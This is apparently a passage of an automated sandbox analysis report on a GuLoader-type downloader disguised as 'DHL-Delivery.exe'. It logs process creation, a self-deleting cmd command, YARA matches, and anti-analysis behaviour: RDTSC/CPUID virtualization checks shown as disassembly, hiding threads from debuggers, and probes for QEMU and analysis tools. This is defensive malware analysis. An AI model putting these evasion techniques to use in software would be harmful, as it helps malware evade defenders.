    Source: unknown, Process created: C:\Windows\SysWOW64\cmmon32.exe C:\Windows\SysWOW64\cmmon32.exe
    Source: unknown, Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\DHL-Delivery.exe'
    Source: unknown, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: unknown, Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 4472 -s 4464
    Source: unknown, Process created: C:\Windows\explorer.exe explorer.exe
    Source: unknown, Process created: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe 'C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe' -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca
    Source: C:\Users\user\Desktop\DHL-Delivery.exe, Process created: C:\Users\user\Desktop\DHL-Delivery.exe 'C:\Users\user\Desktop\DHL-Delivery.exe'
    Source: C:\Windows\SysWOW64\cmmon32.exe, Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\DHL-Delivery.exe'
    Source: C:\Windows\explorer.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{660b90c8-73a9-4b58-8cae-355b7f55341b}\InProcServer32
    Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe, File opened: C:\Windows\SYSTEM32\msftedit.dll
    Source: Window Recorder, Window detected: More than 3 window changes detected
    Source: Binary string: wntdll.pdb source: DHL-Delivery.exe, cmmon32.exe
    Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000007.00000002.2744697687.000000000FC00000.00000002.00000001.sdmp, explorer.exe, 00000012.00000002.3681120064.0000000007280000.00000002.00000001.sdmp
    Source: Binary string: wscui.pdb source: explorer.exe, 00000007.00000002.2744697687.000000000FC00000.00000002.00000001.sdmp, WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp, explorer.exe, 00000012.00000002.3681120064.0000000007280000.00000002.00000001.sdmp
    Source: Binary string: cmmon32.pdbGCTL source: DHL-Delivery.exe, 00000006.00000003.2175308840.00000000007B5000.00000004.00000001.sdmp
    Source: Binary string: wntdll.pdbUGP source: DHL-Delivery.exe, 00000006.00000002.2194242833.000000001E1D8000.00000040.00000001.sdmp, cmmon32.exe, 0000000A.00000002.3602197613.0000000004C60000.00000040.00000001.sdmp
    Source: Binary string: cmmon32.pdb source: DHL-Delivery.exe, 00000006.00000003.2175308840.00000000007B5000.00000004.00000001.sdmp

    Data Obfuscation:

    Yara detected GuLoader
    Source: Yara match File source: Process Memory Space: DHL-Delivery.exe PID: 892, type: MEMORY
    Source: Yara match File source: Process Memory Space: DHL-Delivery.exe PID: 5880, type: MEMORY
    Yara detected VB6 Downloader Generic
    Source: Yara match File source: Process Memory Space: DHL-Delivery.exe PID: 892, type: MEMORY
    Source: Yara match File source: Process Memory Space: DHL-Delivery.exe PID: 5880, type: MEMORY
    Source: C:\Windows\explorer.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
    Source: C:\Users\user\Desktop\DHL-Delivery.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\cmmon32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
    Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe Process information set: NOOPENFILEERRORBOX

    Malware Analysis System Evasion:

    Contains functionality to detect hardware virtualization (CPUID execution measurement)
    Source: C:\Users\user\Desktop\DHL-Delivery.exe Code function: 0_2_021A9AFD NtSetInformationThread,LoadLibraryA, 0_2_021A9AFD
    Source: C:\Users\user\Desktop\DHL-Delivery.exe Code function: 0_2_021A2A1B 0_2_021A2A1B
    Source: C:\Users\user\Desktop\DHL-Delivery.exe Code function: 0_2_021A2A51 0_2_021A2A51
    Source: C:\Users\user\Desktop\DHL-Delivery.exe Code function: 0_2_021A28FF 0_2_021A28FF
    Source: C:\Users\user\Desktop\DHL-Delivery.exe Code function: 0_2_021A2921 NtSetInformationThread,LoadLibraryA, 0_2_021A2921
    Source: C:\Users\user\Desktop\DHL-Delivery.exe Code function: 0_2_021A2942 0_2_021A2942
    Source: C:\Users\user\Desktop\DHL-Delivery.exe Code function: 0_2_021A2980 0_2_021A2980
    Source: C:\Users\user\Desktop\DHL-Delivery.exe Code function: 0_2_021A29C5 0_2_021A29C5
    Source: C:\Users\user\Desktop\DHL-Delivery.exe Code function: 0_2_021A1E31 NtSetInformationThread,LoadLibraryA, 0_2_021A1E31
    Detected RDTSC dummy instruction sequence (likely for instruction hammering)
    Source: C:\Users\user\Desktop\DHL-Delivery.exe RDTSC instruction interceptor: First address: 00000000021A907A second address: 00000000021A907A instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a call 00007FBA20A7EA58h 0x0000000f lfence 0x00000012 mov edx, dword ptr [7FFE0014h] 0x00000018 lfence 0x0000001b ret 0x0000001c sub edx, esi 0x0000001e ret 0x0000001f test bh, bh 0x00000021 cmp dh, bh 0x00000023 jmp 00007FBA20A7EA6Eh 0x00000025 cmp edx, D844CA05h 0x0000002b add edi, edx 0x0000002d cmp cl, al 0x0000002f dec dword ptr [ebp+000000F8h] 0x00000035 test bh, bh 0x00000037 cmp dword ptr [ebp+000000F8h], 00000000h 0x0000003e jne 00007FBA20A7EA09h 0x00000040 nop 0x00000041 cmp dh, FFFFFFA9h 0x00000044 test dx, bx 0x00000047 call 00007FBA20A7EAC7h 0x0000004c call 00007FBA20A7EA6Ah 0x00000051 lfence 0x00000054 mov edx, dword ptr [7FFE0014h] 0x0000005a lfence 0x0000005d ret 0x0000005e mov esi, edx 0x00000060 pushad 0x00000061 rdtsc
    Tries to detect Any.run
    Source: C:\Users\user\Desktop\DHL-Delivery.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
    Source: C:\Users\user\Desktop\DHL-Delivery.exe File opened: C:\Program Files\qga\qga.exe
    Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
    Source: SearchUI.exe, 00000019.00000003.2836361144.000001E69FF90000.00000004.00000001.sdmp Binary or memory string: {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\WINDOWS KITS\10\DEBUGGERS\X64\WINDBG.EXE
    Source: explorer.exe, 00000007.00000000.2112294708.0000000005570000.00000004.00000001.sdmp Binary or memory string: 9C:\USERS\user\DOWNLOADS\SYSINTERNALSSUITE\AUTORUNS.EXEC
    Source: SearchUI.exe, 00000019.00000003.2903086858.000001E69FFC1000.00000004.00000001.sdmp Binary or memory string: {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\WINDOWS KITS\10\DEBUGGERS\X86\WINDBG.EXE{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\COBIAN BACKUP 11\CBINTERFACE.EXE
    Source: explorer.exe, 00000012.00000003.2776973957.000000000469F000.00000004.00000001.sdmp Binary or memory string: :C:\USERS\user\DOWNLOADS\SYSINTERNALSSUITE\AUTORUNSC.EXE`/
    Source: SearchUI.exe, 00000019.00000003.2835514740.000001E6A02C5000.00000004.00000001.sdmp Binary or memory string: {6D809377-6AF0-444B-8957-A3773F02200E}\WIRESHARK\WIRESHARK.EXE
    Source: explorer.exe, 00000012.00000003.2776973957.000000000469F000.00000004.00000001.sdmp Binary or memory string: 9C:\USERS\user\DOWNLOADS\SYSINTERNALSSUITE\AUTORUNS.EXE
    Source: explorer.exe, 00000007.00000000.2112294708.0000000005570000.00000004.00000001.sdmp, explorer.exe, 00000012.00000003.2776973957.000000000469F000.00000004.00000001.sdmp Binary or memory string: AUTORUNS.EXE
    Source: SearchUI.exe, 00000019.00000003.2835703283.000001E69FF38000.00000004.00000001.sdmp Binary or memory string: {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\WINDOWS KITS\10\DEBUGGERS\X64\WINDBG.EXE10747
    Source: explorer.exe, 00000007.00000000.2112294708.0000000005570000.00000004.00000001.sdmp, explorer.exe, 00000012.00000003.2776973957.000000000469F000.00000004.00000001.sdmp Binary or memory string: QP9B AUTORUNS.EXEJ
    Source: SearchUI.exe, 00000019.00000003.2903086858.000001E69FFC1000.00000004.00000001.sdmp Binary or memory string: {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\WINDOWS KITS\10\DEBUGGERS\X86\WINDBG.EXE
    Source: DHL-Delivery.exe Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
    Source: explorer.exe, 00000007.00000000.2112294708.0000000005570000.00000004.00000001.sdmp Binary or memory string: :C:\USERS\user\DOWNLOADS\SYSINTERNALSSUITE\AUTORUNSC.EXE
    Source: SearchUI.exe, 00000019.00000003.2835703283.000001E69FF38000.00000004.00000001.sdmp Binary or memory string: {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\WINDOWS KITS\10\DEBUGGERS\X86\WINDBG.EXE11798
    Source: SearchUI.exe, 00000019.00000003.2835703283.000001E69FF38000.00000004.00000001.sdmp Binary or memory string: {6D809377-6AF0-444B-8957-A3773F02200E}\WIRESHARK\WIRESHARK.EXE8116
    Source: explorer.exe, 00000007.00000000.2112294708.0000000005570000.00000004.00000001.sdmp, explorer.exe, 00000012.00000003.2776973957.000000000469F000.00000004.00000001.sdmp Binary or memory string: |!MAUTORUNS.EXE
    Source: SearchUI.exe, 00000019.00000003.2835703283.000001E69FF38000.00000004.00000001.sdmp Binary or memory string: {6D809377-6AF0-444B-8957-A3773F02200E}\SUPERANTISPYWARE\SUPERANTISPYWARE.EXE10112
    Source: SearchUI.exe, 00000019.00000003.2835514740.000001E6A02C5000.00000004.00000001.sdmp Binary or memory string: A278AB0D.MODERNCOMBATFUTUREWAR_H6ADKY7GBF63M!APPPANDORAMEDIAINC.29680B314EFC2_N619G4D5J0FNW!PANDORAAPP{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\WINAMP\WINAMP.EXE{6D809377-6AF0-444B-8957-A3773F02200E}\UNIKEY\UNIKEYNT.EXE{6D809377-6AF0-444B-8957-A3773F02200E}\WIRESHARK\WIRESHARK.EXEA278AB0D.MODERNCOMBAT5BLACKOUT_H6ADKY7GBF63M!APPAMZNMOBILELLC.KINDLEFORWINDOWS8_STFE6VWA9JNBP!COM.AMAZON.KINDLEGAMELOFTSA.DESPICABLEMEMINIONRUSH_0PP20FCEWVVTJ!APP26720RANDOMSALADGAMESLLC.SIMPLESOLITAIRE_KX24DQMAZQK8J!APPMICROSOFT.APPV.CLIENT.VAPP.27CFF4A30D2525B2845582ACF20FFB10
    Source: SearchUI.exe, 00000019.00000003.2897031539.000001E6A02DB000.00000004.00000001.sdmp Binary or memory string: {6D809377-6AF0-444B-8957-A3773F02200E}\SUPERANTISPYWARE\SUPERANTISPYWARE.EXE
    Source: SearchUI.exe, 00000019.00000003.2897031539.000001E6A02DB000.00000004.00000001.sdmp Binary or memory string: {6D809377-6AF0-444B-8957-A3773F02200E}\SUPERANTISPYWARE\SUPERANTISPYWARE.EXEPT
    Tries to detect virtualization through RDTSC time measurements
    Source: C:\Users\user\Desktop\DHL-Delivery.exe RDTSC instruction interceptor: First address: 00000000021A941D second address: 00000000021A945F instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 fnop 0x00000005 cmp al, 80h 0x00000007 test dh, dh 0x00000009 test ah, FFFFFFABh 0x0000000c jmp 00007FBA20C36362h 0x0000000e cmp ax, cx 0x00000011 cmp ax, ax 0x00000014 cmp bx, bx 0x00000017 mov eax, 00000539h 0x0000001c pushad 0x0000001d mov eax, 000000A4h 0x00000022 rdtsc
    Source: C:\Users\user\Desktop\DHL-Delivery.exe RDTSC instruction interceptor: First address: 00000000021A907A second address: 00000000021A907A instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a call 00007FBA20A7EA58h 0x0000000f lfence 0x00000012 mov edx, dword ptr [7FFE0014h] 0x00000018 lfence 0x0000001b ret 0x0000001c sub edx, esi 0x0000001e ret 0x0000001f test bh, bh 0x00000021 cmp dh, bh 0x00000023 jmp 00007FBA20A7EA6Eh 0x00000025 cmp edx, D844CA05h 0x0000002b add edi, edx 0x0000002d cmp cl, al 0x0000002f dec dword ptr [ebp+000000F8h] 0x00000035 test bh, bh 0x00000037 cmp dword ptr [ebp+000000F8h], 00000000h 0x0000003e jne 00007FBA20A7EA09h 0x00000040 nop 0x00000041 cmp dh, FFFFFFA9h 0x00000044 test dx, bx 0x00000047 call 00007FBA20A7EAC7h 0x0000004c call 00007FBA20A7EA6Ah 0x00000051 lfence 0x00000054 mov edx, dword ptr [7FFE0014h] 0x0000005a lfence 0x0000005d ret 0x0000005e mov esi, edx 0x00000060 pushad 0x00000061 rdtsc
    Source: C:\Users\user\Desktop\DHL-Delivery.exe RDTSC instruction interceptor: First address: 00000000021A90B8 second address: 00000000021A90B8 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, 00000001h 0x00000013 cpuid 0x00000015 bt ecx, 1Fh 0x00000019 jc 00007FBA20C36B56h 0x0000001f popad 0x00000020 call 00007FBA20C364DEh 0x00000025 lfence 0x00000028 rdtsc
    Source: C:\Users\user\Desktop\DHL-Delivery.exe RDTSC instruction interceptor: First address: 00000000021A097F second address: 00000000021A09F1 instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 call 00007FBA20A82E40h 0x00000008 call 00007FBA20A7EAC6h 0x0000000d jmp 00007FBA20A7EA6Eh 0x0000000f test bh, bh 0x00000011 mov eax, dword ptr [esp] 0x00000014 cmp dl, 00000038h 0x00000017 inc eax 0x00000018 ret 0x00000019 ret 0x0000001a pushad 0x0000001b mov bx, 0497h 0x0000001f cmp bx, 0497h 0x00000024 jne 00007FBA20A7E9E7h 0x00000026 popad 0x00000027 mov dword ptr [eax+04h], edx 0x0000002a test ebx, BB589C5Ch 0x00000030 test dx, dx 0x00000033 test cl, dl 0x00000035 cmp ch, ah 0x00000037 jmp 00007FBA20A7EA6Ah 0x00000039 cmp ah, ch 0x0000003b push 00000000h 0x0000003d pushad 0x0000003e mov bx, D41Bh 0x00000042 cmp bx, D41Bh 0x00000047 jne 00007FBA20A7E9ACh 0x0000004d popad 0x0000004e push 00000000h 0x00000050 test ebx, 3E544ED9h 0x00000056 push dword ptr [ebp+24h] 0x00000059 test dx, dx 0x0000005c push 00000000h 0x0000005e test cl, dl 0x00000060 push 00000000h 0x00000062 cmp ch, ah 0x00000064 push 00000000h 0x00000066 pushad 0x00000067 mov esi, 000000B8h 0x0000006c rdtsc
    Source: C:\Users\user\Desktop\DHL-Delivery.exe RDTSC instruction interceptor: First address: 00000000021A0CCD second address: 00000000021A0D2A instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 pushad 0x00000004 mov bx, 63E6h 0x00000008 cmp bx, 63E6h 0x0000000d jne 00007FBA20C35F8Eh 0x00000013 popad 0x00000014 test ebx, 4E69577Bh 0x0000001a xor esi, esi 0x0000001c jmp 00007FBA20C3635Eh 0x0000001e push edx 0x0000001f mov edx, F9819563h 0x00000024 cmp edx, F9819563h 0x0000002a jne 00007FBA20C35EAAh 0x00000030 pop edx 0x00000031 test al, dl 0x00000033 test cx, bx 0x00000036 test bh, bh 0x00000038 mov edi, dword ptr [ebp+20h] 0x0000003b pushad 0x0000003c mov esi, 0000000Ah 0x00000041 rdtsc
    Source: C:\Users\user\Desktop\DHL-Delivery.exe RDTSC instruction interceptor: First address: 000000000056941D second address: 000000000056945F instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 fnop 0x00000005 cmp al, 80h 0x00000007 test dh, dh 0x00000009 test ah, FFFFFFABh 0x0000000c jmp 00007FBA20A7EA72h 0x0000000e cmp ax, cx 0x00000011 cmp ax, ax 0x00000014 cmp bx, bx 0x00000017 mov eax, 00000539h 0x0000001c pushad 0x0000001d mov eax, 000000A4h 0x00000022 rdtsc
    Source: C:\Users\user\Desktop\DHL-Delivery.exe RDTSC instruction interceptor: First address: 00000000005690B8 second address: 00000000005690B8 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, 00000001h 0x00000013 cpuid 0x00000015 bt ecx, 1Fh 0x00000019 jc 00007FBA20C36B56h 0x0000001f popad 0x00000020 call 00007FBA20C364DEh 0x00000025 lfence 0x00000028 rdtsc
    Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe Memory allocated: 1E6A1E20000 memory reserve | memory write watch
    Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe Memory allocated: 1EEA3000000 memory reserve | memory write watch
    Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe Memory allocated: 1E6A1F60000 memory reserve | memory write watch
    Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe Memory allocated: 1EEA3420000 memory reserve | memory write watch
    Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe Memory allocated: 1EEA3800000 memory reserve | memory write watch
    Source: C:\Users\user\Desktop\DHL-Delivery.exe Code function: 0_2_021A9AFD rdtsc 0_2_021A9AFD
    Source: C:\Windows\explorer.exe Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
    Source: C:\Users\user\Desktop\DHL-Delivery.exe API coverage: 1.4 %
    Source: C:\Windows\SysWOW64\cmmon32.exe API coverage: 1.8 %
    Source: C:\Windows\SysWOW64\cmmon32.exe TID: 6380 Thread sleep time: -80000s >= -30000s
    Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe File opened: C:\Windows\System32\TileDataRepository.dll
    Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe File opened: C:\Windows\SYSTEM32\Windows.StateRepository.dll
    Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe File opened: C:\Windows\SYSTEM32\StateRepository.Core.dll
    Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe File opened: C:\Windows\System32\appresolver.dll
    Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe File opened: C:\Windows\System32\Windows.StateRepositoryPS.dll
    Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe File opened: C:\Windows\SYSTEM32\profext.dll
    Source: SearchUI.exe, 00000019.00000003.2836624532.000001E69FF60000.00000004.00000001.sdmp Binary or memory string: *|hyper-v manager*|hyper v4225
    Source: SearchUI.exe, 00000019.00000003.2903311597.000001E69FBD9000.00000004.00000001.sdmp Binary or memory string: .09738VMwareInc.VMwareViewClient_23chmsjxv380w!AppC:\SG Interactive\Crossfire Europe\CF_SGIN.exeA278AB0D.OrderChaos_h6adky7gbf63m!AppApp~5`vW9AWA$!!!!!MKKSkPPTViewerWebDownloadFiles<A278AB0D.AsphaltOverdrive_h6adky7gbf63m!App
    Source: SearchUI.exe, 00000019.00000003.2835514740.000001E6A02C5000.00000004.00000001.sdmp Binary or memory string: C:\Bovada\BovadaPoker.exeVMware.View.Client77160C:\EVE\Launcher\evelauncher.exeuplay://launch/568/0QuizUp.QuizUp_n36z36qeaxk8a!AppInfoPath.Designer.410736
    Source: SearchUI.exe, 00000019.00000003.2836361144.000001E69FF90000.00000004.00000001.sdmp Binary or memory string: {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\VMware\VMware Workstation\vmnetcfg.exe
    Source: DHL-Delivery.exe, 00000006.00000003.2067678598.00000000007A2000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW&
    Source: DHL-Delivery.exe, 00000006.00000003.2067678598.00000000007A2000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW Kernel Debug Network Adapter
    Source: SearchUI.exe, 00000019.00000003.2835514740.000001E6A02C5000.00000004.00000001.sdmp Binary or memory string: Mathworks.MATLAB.MATLAB.R2015bVMware.Workstation.vmui
    Source: SearchUI.exe, 00000019.00000003.2835514740.000001E6A02C5000.00000004.00000001.sdmp Binary or memory string: Microsoft.Office.MSPUB.EXE.15VisualStudio.12.0903DB504.QQ_a99ra4d2cbcxa!AppVMware.Workstation.vmplayerC:\wamp\wampmanager.exe
    Source: SearchUI.exe, 00000019.00000003.2835703283.000001E69FF38000.00000004.00000001.sdmp Binary or memory string: VMware.Horizon.Client9116
    Source: SearchUI.exe, 00000019.00000003.2835514740.000001E6A02C5000.00000004.00000001.sdmp Binary or memory string: VMware.Workstation.vmui
    Source: DHL-Delivery.exe Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
    Source: SearchUI.exe, 00000019.00000003.2836361144.000001E69FF90000.00000004.00000001.sdmp Binary or memory string: {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\VMware\VMware Workstation\vmnetcfg.exe{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\PaperCut MF Client\pc-client.exe{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\MetaTrader 4\terminal.exeexe11083{6D809377-6AF0-444B-8957-A3773F02200E}\OrCAD_Demo\PSpice\psched.exe
    Source: explorer.exe, 00000007.00000002.2742124576.000000000E3B0000.00000002.00000001.sdmp, cmd.exe, 0000000B.00000002.2190137433.0000000000BA0000.00000002.00000001.sdmp, WerFault.exe, 0000000F.00000002.2747253396.00000243B7910000.00000002.00000001.sdmp Binary or memory string: Insufficient privileges. Only administrators or users that are members of the Hyper-V Administrators user group are permitted to access virtual machines or containers. To add yourself to the Hyper-V Administrators user group, please see https://aka.ms/hcsadmin for more information.
    Source: DHL-Delivery.exe, 00000006.00000002.2177968069.000000000076C000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW
    Source: explorer.exe, 00000007.00000002.2721404387.0000000004FF6000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
    Source: SearchUI.exe, 00000019.00000003.2835514740.000001E6A02C5000.00000004.00000001.sdmp Binary or memory string: VMware.View.Client
    Source: SearchUI.exe, 00000019.00000003.2835703283.000001E69FF38000.00000004.00000001.sdmp Binary or memory string: {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\VMware\Infrastructure\Virtual Infrastructure Client\Launcher\VpxClient.exe7674
    Source: explorer.exe, 00000012.00000002.3680771366.00000000071E2000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
    Source: C:\Users\user\Desktop\DHL-Delivery.exe Process information queried: ProcessInformation

    Anti Debugging:

    Contains functionality to hide a thread from the debugger
    Source: C:\Users\user\Desktop\DHL-Delivery.exe Code function: 0_2_021A9AFD NtSetInformationThread 000000FE,00000011,00000000,00000000,00000000,00000000,?,00000000,00000000,5FBFF0FB,6DDB9555,?,?,00000087,00000040,021A0A1C 0_2_021A9AFD
    Hides threads from debuggers
    Source: C:\Users\user\Desktop\DHL-Delivery.exe Thread information set: HideFromDebugger
    Source: C:\Users\user\Desktop\DHL-Delivery.exe Thread information set: HideFromDebugger
    Source: C:\Users\user\Desktop\DHL-Delivery.exe Thread information set: HideFromDebugger
    Source: C:\Users\user\Desktop\DHL-Delivery.exe Process queried: DebugPort
    Source: C:\Users\user\Desktop\DHL-Delivery.exe Process queried: DebugPort
    Source: C:\Users\user\Desktop\DHL-Delivery.exe Process queried: DebugPort
    Source: C:\Windows\SysWOW64\cmmon32.exe Process queried: DebugPort
    Source: C:\Users\user\Desktop\DHL-Delivery.exe Code function: 0_2_021A9AFD rdtsc 0_2_021A9AFD
    Source: C:\Users\user\Desktop\DHL-Delivery.exe Code function: 0_2_021A64C5 LdrInitializeThunk, 0_2_021A64C5
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E1ADF9C mov eax, dword ptr fs:[00000030h]6_2_1E1ADF9C
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E1ADF9C mov eax, dword ptr fs:[00000030h]6_2_1E1ADF9C
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E1ADF9C mov eax, dword ptr fs:[00000030h]6_2_1E1ADF9C
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E1ADF9C mov eax, dword ptr fs:[00000030h]6_2_1E1ADF9C
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E1ADF9C mov eax, dword ptr fs:[00000030h]6_2_1E1ADF9C
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E1ADF9C mov eax, dword ptr fs:[00000030h]6_2_1E1ADF9C
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E119F98 mov eax, dword ptr fs:[00000030h]6_2_1E119F98
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E113F9B mov eax, dword ptr fs:[00000030h]6_2_1E113F9B
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0D9F80 mov eax, dword ptr fs:[00000030h]6_2_1E0D9F80
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E16AF84 mov eax, dword ptr fs:[00000030h]6_2_1E16AF84
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E103F86 mov eax, dword ptr fs:[00000030h]6_2_1E103F86
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0DDF90 mov eax, dword ptr fs:[00000030h]6_2_1E0DDF90
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0DDF90 mov eax, dword ptr fs:[00000030h]6_2_1E0DDF90
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0DDF90 mov eax, dword ptr fs:[00000030h]6_2_1E0DDF90
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0DDF90 mov eax, dword ptr fs:[00000030h]6_2_1E0DDF90
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0DDF90 mov eax, dword ptr fs:[00000030h]6_2_1E0DDF90
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0DDF90 mov eax, dword ptr fs:[00000030h]6_2_1E0DDF90
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E108FB4 mov eax, dword ptr fs:[00000030h]6_2_1E108FB4
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E1B1FB4 mov eax, dword ptr fs:[00000030h]6_2_1E1B1FB4
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0E6FBB mov eax, dword ptr fs:[00000030h]6_2_1E0E6FBB
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0E6FBB mov eax, dword ptr fs:[00000030h]6_2_1E0E6FBB
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0E3FB0 mov eax, dword ptr fs:[00000030h]6_2_1E0E3FB0
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0E3FB0 mov eax, dword ptr fs:[00000030h]6_2_1E0E3FB0
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0E3FB0 mov eax, dword ptr fs:[00000030h]6_2_1E0E3FB0
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0E3FB0 mov eax, dword ptr fs:[00000030h]6_2_1E0E3FB0
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0E3FB0 mov eax, dword ptr fs:[00000030h]6_2_1E0E3FB0
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0E3FB0 mov eax, dword ptr fs:[00000030h]6_2_1E0E3FB0
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E1A3FA5 mov ebx, dword ptr fs:[00000030h]6_2_1E1A3FA5
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E10EFD0 mov eax, dword ptr fs:[00000030h]6_2_1E10EFD0
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E10EFD0 mov eax, dword ptr fs:[00000030h]6_2_1E10EFD0
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E10EFD0 mov eax, dword ptr fs:[00000030h]6_2_1E10EFD0
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E10EFD0 mov eax, dword ptr fs:[00000030h]6_2_1E10EFD0
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E10EFD0 mov eax, dword ptr fs:[00000030h]6_2_1E10EFD0
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E10EFD0 mov edx, dword ptr fs:[00000030h]6_2_1E10EFD0
